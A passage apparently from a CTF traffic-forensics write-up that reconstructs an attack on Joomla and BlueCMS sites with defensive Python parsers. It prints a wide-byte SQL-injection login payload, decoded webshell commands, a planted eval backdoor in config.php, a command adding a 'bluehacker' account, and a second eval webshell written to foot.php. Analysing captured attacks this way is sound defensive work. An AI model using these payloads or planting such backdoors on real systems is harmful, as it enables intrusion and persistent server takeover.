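    ("POST", "/administrator/index.php", "username=ftpadmin&passwd=wrong2" + LOGIN, 303, ""),
    ("GET", "/administrator/index.php", "", 200, FAIL_PAGE),
    ("POST", "/administrator/index.php", "username=admin&passwd=wrong3" + LOGIN, 303, ""),
    ("GET", "/administrator/index.php", "", 200, FAIL_PAGE),
    ("GET", "/index.php", "", 200, "<html>front page</html>"),
    ("POST", "/administrator/index.php", "username=admin&passwd=correct" + LOGIN, 303, ""),
    ("GET", "/administrator/index.php", "", 200,
     '<html><title>test - Administration</title><ul class="nav">...</ul></html>'),
]


def is_login_post(method, path, body):
    """True for a Joomla com_login form submission to the administrator index."""
    params = parse_qs(body)
    return (method == "POST" and path == "/administrator/index.php"
            and params.get("option") == ["com_login"]
            and params.get("task") == ["login"])


def classify_logins(transactions):
    """Return [(username, outcome)] in capture order.

    outcome is "failed" or "success" from the body of the next GET of the
    admin index, or "unknown" when no 303 / follow-up GET was captured.
    """
    results = []
    for i, (method, path, body, status, _resp) in enumerate(transactions):
        if not is_login_post(method, path, body):
            continue
        user = parse_qs(body).get("username", [""])[0]
        outcome = "unknown"
        if status == 303:
            # the redirect target is the next GET of the administrator index
            for m, p, _b, _s, resp in transactions[i + 1:]:
                if m == "GET" and p == "/administrator/index.php":
                    outcome = "failed" if FAIL_MARKER in resp else "success"
                    break
        results.append((user, outcome))
    return results


def brute_force_report(results, threshold=3):
    """Count failures per account and note the first success that follows them."""
    failures, failed_so_far, first_success = {}, 0, None
    for user, outcome in results:
        if outcome == "failed":
            failures[user] = failures.get(user, 0) + 1
            failed_so_far += 1
        elif outcome == "success" and failed_so_far and first_success is None:
            first_success = (user, failed_so_far)  # account, failures before it
    return {"failures": failures,
            "suspicious": failed_so_far >= threshold,
            "success_after_failures": first_success}


if __name__ == "__main__":
    res = classify_logins(SAMPLE)
    print(res)
    print(brute_force_report(res))
```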

That roughly completes the analysis of Jshell.

Next, let's see how the attacker uploaded Bshell.
Bshell sits on the internal network; the attacker pivoted in with reGeorg, the tunnel script being tunnel.php.
There is a small trick here:
in tunnel.php's implementation, each independent TCP connection is maintained by its own PHP session,
so an HTTP request bound for the internal network can be tracked by its PHPSESSID.
The URL that opens a new connection looks like ?cmd=connect&target=8.8.8.8&port=8888
Sending data looks like ?cmd=forward
Reading data: ?cmd=read
Closing the connection: ?cmd=disconnect
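Added example, not from the writeup, that applies the PHPSESSID trick just described: it groups the ?cmd=connect / forward / read / disconnect requests by session, records requests whose connect was never captured, and derives the per-target ports and the scanned range asked for in the first problem. The request dump and the session ids are constructed.

```python
#!/usr/bin/env python3
"""Reconstruct reGeorg tunnel sessions from dumped HTTP requests.

tunnel.php keeps each tunneled TCP connection in its own PHP session, so
the PHPSESSID cookie ties a ?cmd=connect to the ?cmd=forward, ?cmd=read
and ?cmd=disconnect requests that follow it. Grouping by session gives the
target and port behind every tunnel and, from those, the scanned range.
"""
import ipaddress
import re
from collections import defaultdict
from urllib.parse import parse_qs, urlsplit

# Constructed sample (request line + Cookie header), not from the capture; ids made up.
SAMPLE_DUMP = """\
POST http://172.16.10.115/tunnel.php?cmd=connect&target=192.168.28.131&port=21 HTTP/1.1
Cookie: PHPSESSID=aaa111
POST http://172.16.10.115/tunnel.php?cmd=forward HTTP/1.1
Cookie: PHPSESSID=aaa111
POST http://172.16.10.115/tunnel.php?cmd=read HTTP/1.1
Cookie: PHPSESSID=aaa111
POST http://172.16.10.115/tunnel.php?cmd=connect&target=192.168.28.120&port=445 HTTP/1.1
Cookie: PHPSESSID=bbb222
POST http://172.16.10.115/tunnel.php?cmd=disconnect HTTP/1.1
Cookie: PHPSESSID=bbb222
POST http://172.16.10.115/tunnel.php?cmd=connect&target=192.168.28.135&port=80 HTTP/1.1
Cookie: PHPSESSID=ccc333
POST http://172.16.10.115/tunnel.php?cmd=disconnect HTTP/1.1
Cookie: PHPSESSID=aaa111
POST http://172.16.10.115/tunnel.php?cmd=forward HTTP/1.1
Cookie: PHPSESSID=zzz999
"""

REQUEST_LINE = re.compile(r"^(?:GET|POST) (\S*/tunnel\S*) HTTP/1\.[01]$")
SESSION_COOKIE = re.compile(r"PHPSESSID=([0-9A-Za-z,-]+)")


def parse_requests(dump):
    """Return one {"sessid", "cmd", "params"} dict per tunnel.php request.

    A request line opens a new request; the Cookie header that follows it
    (before the next request line) supplies the session id.
    """
    requests, current = [], None
    for line in dump.splitlines():
        m = REQUEST_LINE.match(line)
        if m:
            query = parse_qs(urlsplit(m.group(1)).query)
            params = {k: v[0] for k, v in query.items()}
            current = {"sessid": None, "cmd": params.pop("cmd", None), "params": params}
            requests.append(current)
        elif current is not None and line.startswith("Cookie:"):
            c = SESSION_COOKIE.search(line)
            if c:
                current["sessid"] = c.group(1)
    return requests


def track_sessions(requests):
    """Fold the requests into per-session connection state.

    Returns (sessions, orphans): sessions maps a PHPSESSID to its connect
    target, port, forward/read counts and whether it was closed; orphans are
    requests whose session never issued a connect (connect outside the capture).
    """
    sessions, orphans = {}, []
    for req in requests:
        sid, cmd = req["sessid"], req["cmd"]
        if cmd == "connect":
            sessions[sid] = {"target": req["params"].get("target"),
                             "port": int(req["params"].get("port", 0)),
                             "forward": 0, "read": 0, "closed": False}
        elif sid in sessions and cmd in ("forward", "read"):
            sessions[sid][cmd] += 1
        elif sid in sessions and cmd == "disconnect":
            sessions[sid]["closed"] = True
        else:
            orphans.append((sid, cmd))
    return sessions, orphans


def targets_by_host(sessions):
    """Map each tunneled target IP to the sorted ports it was connected to."""
    ports = defaultdict(set)
    for s in sessions.values():
        if s["target"]:
            ports[s["target"]].add(s["port"])
    return {ip: sorted(p) for ip, p in ports.items()}


def scan_range(sessions):
    """Lowest and highest target address, i.e. the range asked for in problem 1."""
    ips = sorted(ipaddress.ip_address(s["target"]) for s in sessions.values() if s["target"])
    return (str(ips[0]), str(ips[-1])) if ips else (None, None)


if __name__ == "__main__":
    sess, orphans = track_sessions(parse_requests(SAMPLE_DUMP))
    print(targets_by_host(sess), orphans, "%s-%s" % scan_range(sess))
```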


Here a login was performed:


admin_name=simple%d5%27%20or%201%3d1%23&admin_pwd=simple&submit=%B5%C7%C2%BC&act=do_login
// Logged in directly with a wide-byte (GBK) SQL injection

Then the template editor /admin/tpl_manage.php was used to edit ../data/config.php


At this point the attacker has created the webshell; next, let's analyse how the webshell was used.

grep -o 'Bshell.*' http.txt > Bshell
#!/usr/bin/env python3
# Decode the Bshell POST bodies extracted above into the file "Bshell".
# Each body has the form:
#   Bshell=@eval(base64_decode($_POST[z0]));&z0=...&z1=...&z2=...
import base64
import binascii
from urllib.parse import unquote

with open("Bshell") as f:
    for line in f:
        print("-" * 32)
        data = unquote(line.strip())
        print(data)
        # every parameter after the first is base64: restore the padding the
        # client dropped, and fall back to the raw value when it is not base64
        for part in data.split("&")[1:]:
            key, _, value = part.partition("=")
            value += "=" * (-len(value) % 4)
            try:
                print("%s=%s" % (key, base64.b64decode(value, validate=True).decode("utf-8", "replace")))
            except binascii.Error:
                print("%s=%s" % (key, part.partition("=")[2]))
Bshell=@eval(base64_decode($_POST[z0]));&z0=<base64 payload omitted; decoded below>
z0=@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("->|");;$D=dirname($_SERVER["SCRIPT_FILENAME"]);if($D=="")$D=dirname($_SERVER["PATH_TRANSLATED"]);$R="{$D}\t";if(substr($D,0,1)!="/"){foreach(range("A","Z") as $L)if(is_dir("{$L}:"))$R.="{$L}:";}$R.="\t";$u=(function_exists('posix_getegid'))?@posix_getpwuid(@posix_geteuid()):'';$usr=($u)?$u['name']:@get_current_user();$R.=php_uname();$R.="({$usr})";print $R;;echo("|<-");die();
// Get the target server's OS information and user name
->|C:/phpstudy/WWW/bluecms/data C:D:    Windows NT OA-43EAD51FB6C5 5.1 build 2600 (Windows XP Professional Service Pack 3) i586(Administrator)|<-

--------------------------------
Bshell=@eval(base64_decode($_POST[z0]));&z0=<base64 payload omitted; decoded below>&z1=QzpcXA==
z0=@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("->|");;$D=base64_decode($_POST["z1"]);$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D."/".$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."
";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("|<-");die();
z1=C:\\
// List every file in the target server's C:\\ directory
addons/  2017-08-29 03:38:21 0   0777
Documents and Settings/ 2017-09-06 03:58:45 0   0777
phpstudy/   2017-09-06 03:39:12 0   0777
Program Files/  2017-09-06 03:53:46 0   0555
RECYCLER/   2017-08-29 03:37:07 0   0777
System Volume Information/  2017-07-24 03:56:23 0   0777
WINDOWS/    2017-08-28 06:55:01 0   0777
AUTOEXEC.BAT    2017-07-24 03:54:32 0   0777
boot.ini    2017-07-24 03:52:40 211 0666
bootfont.bin    2008-04-14 12:00:00 322730  0444
CONFIG.SYS  2017-07-24 03:54:32 0   0666
IO.SYS  2017-07-24 03:54:32 0   0444
MSDOS.SYS   2017-07-24 03:54:32 0   0444
NTDETECT.COM    2008-04-14 12:00:00 47564   0555
ntldr   2008-04-14 12:00:00 257728  0444
pagefile.sys    2017-09-07 11:47:21 805306368   0666

--------------------------------
Bshell=@eval(base64_decode($_POST[z0]));&z0=<base64 payload omitted; decoded below>&z1=QzpcXA==
z0=@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("->|");;$D=base64_decode($_POST["z1"]);$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D."/".$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."
";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("|<-");die();
z1=C:\\
// List every file in the target server's C:\\ directory

--------------------------------
Bshell=@eval(base64_decode($_POST[z0]));&z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0+fCIpOzskcD1iYXNlNjRfZGVjb2RlKCRfUE9TVFsiejEiXSk7JHM9YmFzZTY0X2RlY29kZSgkX1BPU1RbInoyIl0pOyRkPWRpcm5hbWUoJF9TRVJWRVJbIlNDUklQVF9GSUxFTkFNRSJdKTskYz1zdWJzdHIoJGQsMCwxKT09Ii8iPyItYyBcInskc31cIiI6Ii9jIFwieyRzfVwiIjskcj0ieyRwfSB7JGN9IjtAc3lzdGVtKCRyLiIgMj4mMSIsJHJldCk7cHJpbnQgKCRyZXQhPTApPyIKcmV0PXskcmV0fQoiOiIiOztlY2hvKCJ8PC0iKTtkaWUoKTs=&z1=Y21k&z2=Y2QgL2QgIkM6XHBocHN0dWR5XFdXV1xibHVlY21zXGRhdGFcIiZuZXQgdXNlciBibHVlaGFja2VyIHJlZGhhY2tlcjFAMyAvYWRkJmVjaG8gW1NdJmNkJmVjaG8gW0Vd
z0=@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("->|");;$p=base64_decode($_POST["z1"]);$s=base64_decode($_POST["z2"]);$d=dirname($_SERVER["SCRIPT_FILENAME"]);$c=substr($d,0,1)=="/"?"-c \"{$s}\"":"/c \"{$s}\"";$r="{$p} {$c}";@system($r." 2>&1",$ret);print ($ret!=0)?"
ret={$ret}
":"";;echo("|<-");die();
z1=cmd
z2=cd /d "C:\phpstudy\WWW\bluecms\data\"&net user bluehacker redhacker1@3 /add&echo [S]&cd&echo [E]
// Run the system command net user bluehacker redhacker1@3 /add

--------------------------------
Bshell=@eval(base64_decode($_POST[z0]));&z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0+fCIpOzskcD1iYXNlNjRfZGVjb2RlKCRfUE9TVFsiejEiXSk7JHM9YmFzZTY0X2RlY29kZSgkX1BPU1RbInoyIl0pOyRkPWRpcm5hbWUoJF9TRVJWRVJbIlNDUklQVF9GSUxFTkFNRSJdKTskYz1zdWJzdHIoJGQsMCwxKT09Ii8iPyItYyBcInskc31cIiI6Ii9jIFwieyRzfVwiIjskcj0ieyRwfSB7JGN9IjtAc3lzdGVtKCRyLiIgMj4mMSIsJHJldCk7cHJpbnQgKCRyZXQhPTApPyIKcmV0PXskcmV0fQoiOiIiOztlY2hvKCJ8PC0iKTtkaWUoKTs=&z1=Y21k&z2=Y2QgL2QgIkM6XHBocHN0dWR5XFdXV1xibHVlY21zXGRhdGFcIiZuZXQgdXNlciBibHVlaGFja2VyIHJlZGhhY2tlcjFAMyAvYWRkJmVjaG8gW1NdJmNkJmVjaG8gW0Vd
z0=@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("->|");;$p=base64_decode($_POST["z1"]);$s=base64_decode($_POST["z2"]);$d=dirname($_SERVER["SCRIPT_FILENAME"]);$c=substr($d,0,1)=="/"?"-c \"{$s}\"":"/c \"{$s}\"";$r="{$p} {$c}";@system($r." 2>&1",$ret);print ($ret!=0)?"
ret={$ret}
":"";;echo("|<-");die();
z1=cmd
z2=cd /d "C:\phpstudy\WWW\bluecms\data\"&net user bluehacker redhacker1@3 /add&echo [S]&cd&echo [E]
// Run the system command net user bluehacker redhacker1@3 /add

--------------------------------
Bshell=@eval(base64_decode($_POST[z0]));&z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0+fCIpOzskRD1iYXNlNjRfZGVjb2RlKCRfUE9TVFsiejEiXSk7JEY9QG9wZW5kaXIoJEQpO2lmKCRGPT1OVUxMKXtlY2hvKCJFUlJPUjovLyBQYXRoIE5vdCBGb3VuZCBPciBObyBQZXJtaXNzaW9uISIpO31lbHNleyRNPU5VTEw7JEw9TlVMTDt3aGlsZSgkTj1AcmVhZGRpcigkRikpeyRQPSRELiIvIi4kTjskVD1AZGF0ZSgiWS1tLWQgSDppOnMiLEBmaWxlbXRpbWUoJFApKTtAJEU9c3Vic3RyKGJhc2VfY29udmVydChAZmlsZXBlcm1zKCRQKSwxMCw4KSwtNCk7JFI9Ilx0Ii4kVC4iXHQiLkBmaWxlc2l6ZSgkUCkuIlx0Ii4kRS4iCiI7aWYoQGlzX2RpcigkUCkpJE0uPSROLiIvIi4kUjtlbHNlICRMLj0kTi4kUjt9ZWNobyAkTS4kTDtAY2xvc2VkaXIoJEYpO307ZWNobygifDwtIik7ZGllKCk7&z1=QzpcXHBocHN0dW
z0=@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("->|");;$D=base64_decode($_POST["z1"]);$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D."/".$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."
";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("|<-");die();
z1=C:\\phpstu
// List every file in the target server's C:\\phpstu directory (the path is truncated in the capture)
->|./   2017-09-07 08:26:56 0   0777       
../ 2017-09-06 03:39:12 0   0777           
bluecms/    2017-09-07 08:27:01 0   0777   
metinfo/    2017-09-07 07:05:58 0   0777   
phpMyAdmin/ 2017-09-06 03:38:48 0   0777   
l.php   2014-02-27 15:02:21 21201   0666   
phpinfo.php 2013-05-09 12:56:36 23  0666   
|<-                                        


--------------------------------
Bshell=@eval(base64_decode($_POST[z0]));&z0=<base64 payload omitted; decoded below>&z1=QzpcXHBocHN0dW
z0=@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("->|");;$D=base64_decode($_POST["z1"]);$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D."/".$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."
";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("|<-");die();
z1=C:\\phpstu
// List every file in the target server's C:\\phpstu directory (the path is truncated in the capture)

--------------------------------
Bshell=@eval(base64_decode($_POST[z0]));&z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0+fCIpOzskRD1iYXNlNjRfZGVjb2RlKCRfUE9TVFsiejEiXSk7JEY9QG9wZW5kaXIoJEQpO2lmKCRGPT1OVUxMKXtlY2hvKCJFUlJPUjovLyBQYXRoIE5vdCBGb3VuZCBPciBObyBQZXJtaXNzaW9uISIpO31lbHNleyRNPU5VTEw7JEw9TlVMTDt3aGlsZSgkTj1AcmVhZGRpcigkRikpeyRQPSRELiIvIi4kTjskVD1AZGF0ZSgiWS1tLWQgSDppOnMiLEBmaWxlbXRpbWUoJFApKTtAJEU9c3Vic3RyKGJhc2VfY29udmVydChAZmlsZXBlcm1zKCRQKSwxMCw4KSwtNCk7JFI9Ilx0Ii4kVC4iXHQiLkBmaWxlc2l6ZSgkUCkuIlx0Ii4kRS4iCiI7aWYoQGlzX2RpcigkUCkpJE0uPSROLiIvIi4kUjtlbHNlICRMLj0kTi4kUjt9ZWNobyAkTS4kTDtAY2xvc2VkaXIoJEYpO307ZWNobygifDwtIik7ZGllKCk7&z1=QzpcXHBocHN0dWR5XFxXV1dcXA==
z0=@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("->|");;$D=base64_decode($_POST["z1"]);$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D."/".$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."
";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("|<-");die();
z1=C:\\phpstudy\\WWW\\
// List every file in the C:\\phpstudy\\WWW\\ directory on the target server
->|./   2017-09-07 08:27:01 0   0777                   
../ 2017-09-07 08:26:56 0   0777
admin/  2017-09-07 08:27:02 0   0777
api/    2017-09-07 08:27:01 0   0777
data/   2017-09-07 08:33:05 0   0777
images/ 2017-09-07 08:27:01 0   0777
include/    2017-09-07 08:26:59 0   0777
install/    2017-09-07 08:26:57 0   0777
js/ 2017-09-07 08:26:57 0   0777
templates/  2017-09-07 08:26:56 0   0777
uc_client/  2017-09-07 08:26:56 0   0777
ad_js.php   2010-02-08 13:40:00 869 0666
ann.php 2010-02-08 13:39:54 2478    0666
category.php    2010-02-08 13:47:48 8821    0666
comment.php 2010-02-08 13:39:40 3531    0666
guest_book.php  2010-02-08 13:51:28 2538    0666
index.php   2010-02-08 13:40:08 7471    0666
info.php    2010-02-08 13:50:02 4527    0666
info_index.php  2010-02-08 13:50:50 1869    0666
news.php    2010-01-07 10:02:34 3477    0666
news_cat.php    2010-02-08 13:54:52 2069    0666
publish.php 2010-02-09 03:40:36 9185    0666
robots.txt  2009-12-01


--------------------------------
Bshell=@eval(base64_decode($_POST[z0]));&z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0+fCIpOzskRD1iYXNlNjRfZGVjb2RlKCRfUE9TVFsiejEiXSk7JEY9QG9wZW5kaXIoJEQpO2lmKCRGPT1OVUxMKXtlY2hvKCJFUlJPUjovLyBQYXRoIE5vdCBGb3VuZCBPciBObyBQZXJtaXNzaW9uISIpO31lbHNleyRNPU5VTEw7JEw9TlVMTDt3aGlsZSgkTj1AcmVhZGRpcigkRikpeyRQPSRELiIvIi4kTjskVD1AZGF0ZSgiWS1tLWQgSDppOnMiLEBmaWxlbXRpbWUoJFApKTtAJEU9c3Vic3RyKGJhc2VfY29udmVydChAZmlsZXBlcm1zKCRQKSwxMCw4KSwtNCk7JFI9Ilx0Ii4kVC4iXHQiLkBmaWxlc2l6ZSgkUCkuIlx0Ii4kRS4iCiI7aWYoQGlzX2RpcigkUCkpJE0uPSROLiIvIi4kUjtlbHNlICRMLj0kTi4kUjt9ZWNobyAkTS4kTDtAY2xvc2VkaXIoJEYpO307ZWNobygifDwtIik7ZGllKCk7&z1=QzpcXHBocHN0dWR5XFxXV1dcXGJsdWVjbXNcXA==
z0=@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("->|");;$D=base64_decode($_POST["z1"]);$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D."/".$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."
";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("|<-");die();
z1=C:\\phpstudy\\WWW\\bluecms\\
// List every file in the C:\\phpstudy\\WWW\\bluecms\\ directory on the target server
->|./   2017-09-07 08:33:05 0   0777                
../ 2017-09-07 08:27:01 0   0777
admin/  2017-09-07 08:27:01 0   0777
backup/ 2017-09-07 08:27:01 0   0777
cache/  2017-09-07 08:27:01 0   0777
compile/    2017-09-08 02:30:03 0   0777
upload/ 2017-09-07 08:27:01 0   0777
bannedip.cache.php  2017-09-08 09:24:52 25  0666
config.cache.php    2017-09-07 08:33:05 550 0666
config.php  2017-09-08 09:27:58 276 0666
index.htm   2009-10-02 12:46:24 894 0666
update_log.txt  2017-09-07 08:42:58 8   0666

--------------------------------
Bshell=@eval(base64_decode($_POST[z0]));&z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0+fCIpOzskRD1iYXNlNjRfZGVjb2RlKCRfUE9TVFsiejEiXSk7JEY9QG9wZW5kaXIoJEQpO2lmKCRGPT1OVUxMKXtlY2hvKCJFUlJPUjovLyBQYXRoIE5vdCBGb3VuZCBPciBObyBQZXJtaXNzaW9uISIpO31lbHNleyRNPU5VTEw7JEw9TlVMTDt3aGlsZSgkTj1AcmVhZGRpcigkRikpeyRQPSRELiIvIi4kTjskVD1AZGF0ZSgiWS1tLWQgSDppOnMiLEBmaWxlbXRpbWUoJFApKTtAJEU9c3Vic3RyKGJhc2VfY29udmVydChAZmlsZXBlcm1zKCRQKSwxMCw4KSwtNCk7JFI9Ilx0Ii4kVC4iXHQiLkBmaWxlc2l6ZSgkUCkuIlx0Ii4kRS4iCiI7aWYoQGlzX2RpcigkUCkpJE0uPSROLiIvIi4kUjtlbHNlICRMLj0kTi4kUjt9ZWNobyAkTS4kTDtAY2xvc2VkaXIoJEYpO307ZWNobygifDwtIik7ZGllKCk7&z1=QzpcXHBocHN0dW
z0=@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("->|");;$D=base64_decode($_POST["z1"]);$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D."/".$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."
";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("|<-");die();
z1=C:\\phpstu
// List every file in the C:\\phpstu directory on the target server

--------------------------------
Bshell=@eval(base64_decode($_POST[z0]));&z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0+fCIpOzskRj1iYXNlNjRfZGVjb2RlKCRfUE9TVFsiejEiXSk7JFA9QGZvcGVuKCRGLCJyIik7ZWNobyhAZnJlYWQoJFAsZmlsZXNpemUoJEYpKSk7QGZjbG9zZSgkUCk7O2VjaG8oInw8LSIpO2RpZSgpOw==&z1=QzpcXHBocHN0dWR5XFxXV1dcXGJsdWVjbXNcXGRhdGFcXGNvbmZpZy5waHA=
z0=@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("->|");;$F=base64_decode($_POST["z1"]);$P=@fopen($F,"r");echo(@fread($P,filesize($F)));@fclose($P);;echo("|<-");die();
z1=C:\\phpstudy\\WWW\\bluecms\\data\\config.php
// Read the contents of the file C:\\phpstudy\\WWW\\bluecms\\data\\config.php
->|<?php                            
$dbhost   = "localhost";                                    
$dbname   = "bluecms";                      
$dbuser   = "root";                 
$dbpass   = "123456";               
$pre    = "blue_";                  
$cookiedomain = '';                  
$cookiepath = '/';                  
@eval($_POST['Bshell']);            
define('BLUE_CHARSET','gb2312');                        
define('BLUE_VERSION','v1.6');                            
?>|<-                               

--------------------------------
Bshell=@eval(base64_decode($_POST[z0]));&z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0+fCIpOzskZj1iYXNlNjRfZGVjb2RlKCRfUE9TVFsiejEiXSk7JGM9JF9QT1NUWyJ6MiJdOyRjPXN0cl9yZXBsYWNlKCJcciIsIiIsJGMpOyRjPXN0cl9yZXBsYWNlKCJcbiIsIiIsJGMpOyRidWY9IiI7Zm9yKCRpPTA7JGk8c3RybGVuKCRjKTskaSs9MikkYnVmLj11cmxkZWNvZGUoIiUiLnN1YnN0cigkYywkaSwyKSk7ZWNobyhAZndyaXRlKGZvcGVuKCRmLCJ3IiksJGJ1Zik/IjEiOiIwIik7O2VjaG8oInw8LSIpO2RpZSgpOw==&z1=QzpcXHBocHN0dWR5XFxXV1dcXGJsdWVjbXNcXGRhdGFcXGZvb3QucGhw&z2=3C3F706870206576616C28245F504F53545B27636D645F7368656C6C275D293B3F3E
z0=@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("->|");;$f=base64_decode($_POST["z1"]);$c=$_POST["z2"];$c=str_replace("\r","",$c);$c=str_replace("\n","",$c);$buf="";for($i=0;$i<strlen($c);$i+=2)$buf.=urldecode("%".substr($c,$i,2));echo(@fwrite(fopen($f,"w"),$buf)?"1":"0");;echo("|<-");die();
z1=C:\\phpstudy\\WWW\\bluecms\\data\\foot.php
z2=<?php eval($_POST['cmd_shell']);?>
// Write <?php eval($_POST['cmd_shell']);?> into C:\\phpstudy\\WWW\\bluecms\\data\\foot.php

--------------------------------
Bshell=@eval(base64_decode($_POST[z0]));&z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0+fCIpOzskZj1iYXNlNjRfZGVjb2RlKCRfUE9TVFsiejEiXSk7JGM9JF9QT1NUWyJ6MiJdOyRjPXN0cl9yZXBsYWNlKCJcciIsIiIsJGMpOyRjPXN0cl9yZXBsYWNlKCJcbiIsIiIsJGMpOyRidWY9IiI7Zm9yKCRpPTA7JGk8c3RybGVuKCRjKTskaSs9MikkYnVmLj11cmxkZWNvZGUoIiUiLnN1YnN0cigkYywkaSwyKSk7ZWNobyhAZndyaXRlKGZvcGVuKCRmLCJ3IiksJGJ1Zik/IjEiOiIwIik7O2VjaG8oInw8LSIpO2RpZSgpOw==&z1=QzpcXHBocHN0dWR5XFxXV1dcXGJsdWVjbXNcXGRhdGFcXGZvb3QucGhw&z2=3C3F706870206576616C28245F504F53545B27636D645F7368656C6C275D293B3F3E
z0=@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("->|");;$f=base64_decode($_POST["z1"]);$c=$_POST["z2"];$c=str_replace("\r","",$c);$c=str_replace("\n","",$c);$buf="";for($i=0;$i<strlen($c);$i+=2)$buf.=urldecode("%".substr($c,$i,2));echo(@fwrite(fopen($f,"w"),$buf)?"1":"0");;echo("|<-");die();
z1=C:\\phpstudy\\WWW\\bluecms\\data\\foot.php
z2=<?php eval($_POST['cmd_shell']);?>
// Write <?php eval($_POST['cmd_shell']);?> into C:\\phpstudy\\WWW\\bluecms\\data\\foot.php

--------------------------------
